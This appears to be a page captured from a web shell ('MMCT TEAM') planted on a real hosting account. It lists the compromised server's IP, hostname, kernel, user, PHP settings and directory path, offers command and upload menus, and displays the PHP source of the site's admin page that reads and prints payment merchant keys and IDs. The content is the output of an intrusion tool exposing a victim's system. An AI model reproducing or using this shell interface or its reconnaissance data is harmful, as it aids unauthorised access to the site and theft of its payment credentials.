MMCT TEAM
Server IP : 86.38.243.181  /  Your IP : 216.73.216.51
Web Server : LiteSpeed
System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : u986601745 ( 986601745)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u986601745/domains/emrskalsi.com/public_html/admin/tenderfiles/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u986601745/domains/emrskalsi.com/public_html/admin/tenderfiles/../payment-key.php
<?php include('include/sidebar.php'); ?>
    <!-- Start Welcome area -->
    
       <?php include('include/header.php'); 
       $q = "SELECT * FROM payment_key LIMIT 1";
        $result  = mysqli_query($conn,$q);
        $row = mysqli_fetch_assoc($result);
       ?>
       <div class="breadcome-area">
                <div class="container-fluid">
                    <div class="row">
                        <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
                            <div class="breadcome-list">
                                <div class="row">
                                    <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6">
                                        <div class="breadcomb-wp">
                                            <div class="breadcomb-icon">
                                                <i class="icon nalika-home"></i>
                                            </div>
                                            <div class="breadcomb-ctn">
                                                <h2>Payment Key </h2>
                                            </div>
                                        </div>
                                    </div>
                                    <!-- <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6">
                                        <div class="breadcomb-report">
                                            <button data-toggle="tooltip" data-placement="left" title="Download Report" class="btn"><i class="icon nalika-download"></i></button>
                                        </div>
                                    </div> -->
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="product-status mg-b-30">

            <div class="container-fluid">

                <div class="row">

                    <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">

                        <div class="product-status-wrap">

                            <h4>Payment List</h4>

                            <div class="add-product">

                                <!-- <a href="edit-payment-key.php">Add</a> -->

                            </div>

                            <table>

                                <tr>

                                    <th>S.NO</th>

                                    <th>Payment Name</th>

                                    <th>Merchant Key</th>

                                    <th>Merchant ID</th>

                                    <th>Action</th>

                                </tr>
                                <tr>
                                    <td>1</td>
                                    <td><?php echo $row['payment_name'] ?></td>
                                    <td><?php echo $row['merchant_key'] ?></td>
                                    <td><?php echo $row['merchant_id'] ?></td>
                                    <td><a href="edit-payment-key.php?id=<?php echo $row['id'] ?>"><i class="fa fa-pencil-square fa-2x" style="color:#fff;"></i></a></td>
                                </tr>

                            </table>


                        </div>

                    </div>

                </div>

            </div>

        </div>

        <?php include('include/footer.php'); ?>

MMCT - 2023